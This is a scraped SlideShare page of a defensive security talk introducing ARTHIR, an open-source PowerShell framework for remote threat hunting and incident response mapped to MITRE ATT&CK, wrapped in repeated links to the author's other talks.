CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Smart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSSmart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWS
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 

Más de Michael Gough

All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Incident Response Fails
Incident Response FailsIncident Response Fails
Incident Response FailsMichael Gough
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0Michael Gough
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1Michael Gough
 
Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Michael Gough
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0Michael Gough
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?Michael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareMichael Gough
 
Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Michael Gough
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1Michael Gough
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Michael Gough
 
Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Michael Gough
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomwareMichael Gough
 
Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Michael Gough
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSMichael Gough
 
Sandbox vs manual malware analysis v1.1
Sandbox vs manual malware analysis v1.1Sandbox vs manual malware analysis v1.1
Sandbox vs manual malware analysis v1.1Michael Gough
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSMichael Gough
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 

Más de Michael Gough (19)

All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Incident Response Fails
Incident Response FailsIncident Response Fails
Incident Response Fails
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
 
Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malware
 
Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0
 
Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomware
 
Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Sandbox vs manual malware analysis v1.1
Sandbox vs manual malware analysis v1.1Sandbox vs manual malware analysis v1.1
Sandbox vs manual malware analysis v1.1
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 

Último

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Michael Gough - Co-Founder Introduces ARTHIR for Remote Threat Hunting and Incident Response

  • 1. Michael Gough – Co-Founder IMF Security.com LOG-MD.com
  • 2. Whoami • Blue Team Defender Ninjas, Incident Responder, Threat Hunter, Logaholic • Michael – Creator of all those Windows Logging Cheat Sheets and the Malware Management Framework • Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool • BDIR Podcast - “Brakeing Down Incident Response” • Special SHOUT OUT to – Olaf Hartong @OlafHartong – Josh Rickard @MSAdministrator LOG-MD.com
  • 4. So what’s the problem? • There is an event • We would like to investigate it • We walk in with our laptops – Or you use one of your systems • What tools can you or we use to look across all your Windows systems? • Without installing anything!!!! • Using what is already on all Windows systems LOG-MD.com
  • 5. What are our options? • Use what we already have like SCCM, BigFix, etc. • Install a tool with an agent, deal with more agent bloat and agent interaction • Remote into the system • Do a forensics acquisition • Use what is already on the system, living-off-the-land • What we need is already found on all Windows systems! • How can we share what we do with enterprise solutions? • Use something the community can contribute to LOG-MD.com
  • 6. The Challenge • Whether you are a Blue Teamer investigating your own environment • Or a consultant investigating a client • We need a way to execute a wide range of tools, utilities and scripts remotely to 1, 100 or 1000 systems • It needs to be flexible enough to allow us to run, respond, and hunt for many things LOG-MD.com
  • 7. Requirements • Fits on a thumb drive • Can run scripts • Can run tools (no GUI) • Can run utilities (no GUI) • Can run larger jobs (Hash/Registry snapshots) • Schedule Jobs that can run things on a regular basis LOG-MD.com
  • 8. Requirements • Walk in with a laptop • Or use one of your systems • Domain attached and domain creds • No requirement to install anything • Well… we want you to upgrade to PowerShell v5 • PS v5 is the only way to get good PowerShell logging – You didn’t think I wasn’t going to mention the Malware Archaeology Cheat Sheets did you? LOG-MD.com
  • 9. What do you have and use? • What tools do you use for Threat Hunting and Incident Response? • A bunch of utilities, tools, scripts? • An EDR/EPP solution? • Open Source tools and projects? • Do you have anything? • More importantly do you have budget? LOG-MD.com
  • 10. My Top 10 List of tools 1. Log Management – Centralize data collection – Query all the data 2. BigFix or equivalent – Query anything you want on a system – Run scripts, utilities, tools, etc. – Run remediation jobs 3. LOG-MD – Log Harvesting – Hunting – AutoRuns – PowerShell – SRUM – Much more LOG-MD.com
  • 12. The problem I wanted to solve • I want to query all the things #2 • I want to run scripts, utilities, tools #2 • I want to have the option to centralize the data #1 • I want to query that data #1 • I don’t want to, or can’t install anything • Of course I want to run my favorite utility/tool – LOG-MD-Professional LOG-MD.com
  • 13. The problem I wanted to solve • I am one of the creators of LOG-MD • It is a great utility/tool • It does a LOT of what I need to investigate a system • I just needed a way to run it remotely on 1, 100 or 1000 systems to do Threat Hunting and/or Incident Response • And pull back the reports and organize them • Maybe even collect them into a Log Management solution #1 • Without a enterprise solution like BigFix #2 LOG-MD.com
  • 15. 3 years ago… • We announced LOG-MD at this very conference • Today we would like to announce the release of… • ATT&CK Remote Threat Hunting Incident Response ARTHIR.com
  • 16. PowerShell? • PowerShell is on every Windows system • Can we use that? • But can we run our own special binaries? • We love our own tools • Create scripts • Something modular • Allows for community support ARTHIR.com
  • 17. • A modular framework • Leverages an existing project that we modified to do what we wanted and needed • KANSA was good, but lacked some capabilities • I needed to run all features of LOG-MD and pull the reports back • KANSA did not work well at all for LOG-MD • And run other utilities, say Sysinternals ARTHIR.com
  • 18. • So KANSA did some kewl stuff, just not enough • So we modified it • We had a couple issues • Olaf Hartong helped us with report retrieval • Josh Rickard helped us with scheduled tasks • Once these changes were added suddenly we had something that gave me a LOT of what BigFix could do ARTHIR.com
  • 20. What does ATT&CK have to do with it? • We LOVE MITRE ATT&CK • It is a GREAT place to map your hunts to • Or what to detect and hunt for • It’s what your adversaries ACTUALLY do in their attacks • If you can detect and/or hunt for the techniques in MITRE ATT&CK… you are WAY ahead of most ARTHIR.com
  • 21. MITRE ATT&CKTM • The A in ARTHIR stands for ATT&CKTM • The idea here is to encourage you and anyone making modules to map their efforts to MITRE ATT&CK • Help us Help the rest of us • Take this information and any other detection and hunting you can do and add it to YOUR own ATT&CK Matrix ARTHIR.com
  • 22. Add your ATT&CK Mappings • Check MITRE ATT&CK Tactics and Techniques and add them to the ARTHIR module • Map them to an overall matrix ARTHIR.com
  • 23. Cheat Sheets • We released two ATT&CK cheat sheets as a part of my SANS THIR talk in NOLA last year • The goal was to see how good, or bad really good logging would be for detecting or hunting the techniques in ATT&CK • It was shocking how much coverage there was • Over 80% ARTHIR.com
  • 24. Fill out YOUR ATT&CK Matrix ARTHIR.com
  • 25. Remote • The R in ARTHIR stands for Remote • We need to be able to hunt and respond remotely • Execute what we want on 1, 10, 100, or 1000 systems • And not 1 by 1 like you would have to with RDP or some EDRs • Bring back results to a central system • Like BigFix can do ARTHIR.com
  • 26. Threat Hunting • The TH in ARTHIR stands for Threat Hunting • We need to be able to hunt for artifacts from the techniques the adversaries use • Run additional tools and utilities to hunt • Centrally send results to say… log management ARTHIR.com
  • 27. Incident Response • The IR in ARTHIR stands for Incident Response • We need to be able to respond to an attack • Do additional investigation from an alert • Run additional tools and utilities • Centrally send results to say… log management ARTHIR.com
  • 28. Modular • We used the KANSA framework • Even ported a few of the KANSA modules • This framework design worked for us, no reason to totally reinvent the wheel • Create a module, add it to modules.conf • Run the execution parameters • Retrieve the reports ARTHIR.com
  • 29. RECON • We provided some PowerShell scripts to get system names from Active Directory • You need to build a list of systems • And we provided a Ping script so you can test those system names are alive • Add these to Hosts.txt to run your modules against ARTHIR.com
  • 30. Available modules • Several more popular KANSA modules have been converted • More will we done as we move forward and need them • We provided templates so YOU can do it too • Remember that ‘community can contribute’ statement from earlier? ARTHIR.com
  • 31. Root Directory ATT&CK Documentation Known 3rd-Party Modules Recon ARTHIR.ps1 Hosts.txt ARTHIR.com Some ATT&CK Matrix you can use How To Documentation Known 3rd party modules for ARTHIR Where all the modules are and modules.conf Where Recon scripts live The main ARTHIR script Where you places hosts to run modules on
  • 32. Module types Bin Cleanup Info Kansa_Legacy LOG-MD LOG-MD_Tasks Sysinternals Templates ARTHIR.com Where you place .EXE and Zip files Module(s) to delete ARTHIR remnants Modules to collect info about a system Converted KANSA modules All LOG-MD modules Modules to schedule LOG-MD hourly/daily Converted KANSA Sysinternals modules Templates to make your own modules
  • 33. KANSA converted modules ### Configuration modules # Kansa_LegacyConfigGet-Anti-MW-HealthStatus.ps1 # Kansa_LegacyConfigGet-Anti-MW-InfectionStatus.ps1 # Kansa_LegacyConfigGet-Hotfix_Patches.ps1 # Kansa_LegacyConfigGet-Local_Accounts.ps1 # Kansa_LegacyConfigGet-Local_Admin_Accounts.ps1 ### Log modules # Kansa_LegacyLogGet-AppCompatCache.ps1 # Kansa_LegacyLogGet-CBS_Log.ps1 ARTHIR.com
  • 34. KANSA converted modules ### Network modules # Kansa_LegacyDiskGet-Temp_Dir_Listing.ps1 # Kansa_LegacyDiskGet-User_Name_Dir_Listing.ps1 # Kansa_LegacyDiskGet-User_Name_Dir_Listing_List_of_Extensions.ps1 # Kansa_LegacyDiskGet-Users_Dir_Listing.ps1 ### Network modules # Kansa_LegacyNetGet-Arp.ps1 # Kansa_LegacyNetGet-DNS-Cache.ps1 # Kansa_LegacyNetGet-Net-IP-Interface.ps1 # Kansa_LegacyNetGet-Netstat.ps1 ### Cleanup/Delete ARTHIR folders # CleanupGetDelete_ARTHIR_Folders.ps1 ARTHIR.com
  • 35. Templates • Get-Binary-Template.ps1 • Get-Script-Template.ps1 • Get-Task-Template-Daily.ps1 • Get-Task-Template-Hourly.ps1 • Get-Zip-Template.ps1 • Variables used to make editing/changing modules easier than KANSA ARTHIR.com
  • 36. Modules for Utility/Tools • LOG-MD… Duh • LOG-MD Free Edition • LOG-MD-Professional, all features • LOG-MD-Professional Tasks, Hourly & Daily • Sysinternals – Sigcheck • Sysinternals - Handle ARTHIR.com
  • 39. You will make PowerShell noise • Since ARTHIR uses PowerShell… • The adversaries uses PowerShell • You will add events to the PowerShell logs • So test and whitelist the scriptblocks that ARTHIR creates • Make it easier to hunt the bad • LOG-MD provides a Whitelist_PowerShell.txt with many exclusions ARTHIR.com
  • 40. Some ARTHIR PS Exclusions # ARTHIR related items to exclude known ARTHIR components # *ARTHIR - * *## ARTHIR* *$ARTHIR_Dir* *CODE ARTHIR* *ARTHIR* *$ARTHIR_OutputDir* *value="ProcessName. ProcId. HandleId. Owner. Type. Perms. Name* *Write-Output "Prefetch not enabled on* # # More generic ARTHIR scriptblocks # *PackageManagement.format.ps1xml* *NestedModules="Microsoft.PowerShell.Commands.Management.dll* *RootModule = "Microsoft.PowerShell.PackageManagement.dll* *System.Management.Automation.PSDriveInfo] $driveInfo* *Microsoft.PowerShell.ManagementTest-Path $pathToValidate* *Microsoft.PowerShell.ManagementTest-Path $getPathItems* *function PSCopyFileFromRemoteSession* *function PSGetFileMetadata* *function PerformCopyFileFromRemoteSession* *function PSSourceSupportsAlternateStreams* *indentString = "+ PSComputerName : " + $originInfo.PSComputerName* *-ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView* *# .ExternalHelp System.Management.Automation.dll-help.xml* LOG-MD.com
  • 41. Conclusion • Try it you’ll like it • Mikey does… • Contribute • Send us ideas • It’s Open Source on GitHub • www.ARTHIR.com ARTHIR.com
  • 43. Cheat Sheets • Windows ATT&CK Logging Cheat Sheet • Windows ATT&CK LOG-MD Cheat Sheet – www.MalwareArchaeology.com/cheat-sheets • ATT&CK Matrix Spreadsheet template – Comes with ARTHIR Get ARTHIR • www.ARTHIR.com • https://github.com/MalwareArchaeology/ARTHIR LOG-MD.com
  • 44. MITRE ATT&CKTM Sites MITRE ATTACK • https://attack.mitre.org/ Enterprise • https://attack.mitre.org/techniques/enterprise/ ATT&CK Navigator • https://mitre.github.io/attack-navigator/enterprise/ LOG-MD.com
  • 45. Recommend Sites OSSEM - Open Source Security Events Metadata • https://github.com/Cyb3rWard0g/OSSEM SOCPrime SIGMA to SIEM convertor • https://uncoder.io/ SIGMA - Generic Signature Format for SIEM Systems • https://github.com/Neo23x0/sigma Red Canary Atomic Red Team • https://atomicredteam.io/ MATE - MITRE ATT&CK® Technique Emulation • https://github.com/fugawi/mate Atomic Threat Coverage • https://github.com/krakow2600/atomic-threat-coverage LOG-MD.com
  • 46. Recommend Sites The ThreatHunter-Playbook • https://github.com/Cyb3rWard0g/ThreatHunter- Playbook OLAF Hartong ThreatHunting | A Splunk app mapped to MITRE ATT&CK to guide your threat hunts • https://github.com/olafhartong/ThreatHunting Sysmon-modular | A Sysmon configuration repository for everybody to customize • https://github.com/olafhartong/sysmon-modular LOG-MD.com
  • 48. Questions • You can find us on the Twitters – @HackerHurricane • LOG-MD.com • MalwareArchaeology.com • Preso will be on SlideShare and linked on MalwareArchaeology.com • Listen to the PodCast to hear the rest of this topic – http://www.brakeingdownir.libsyn.com/ LOG-MD.com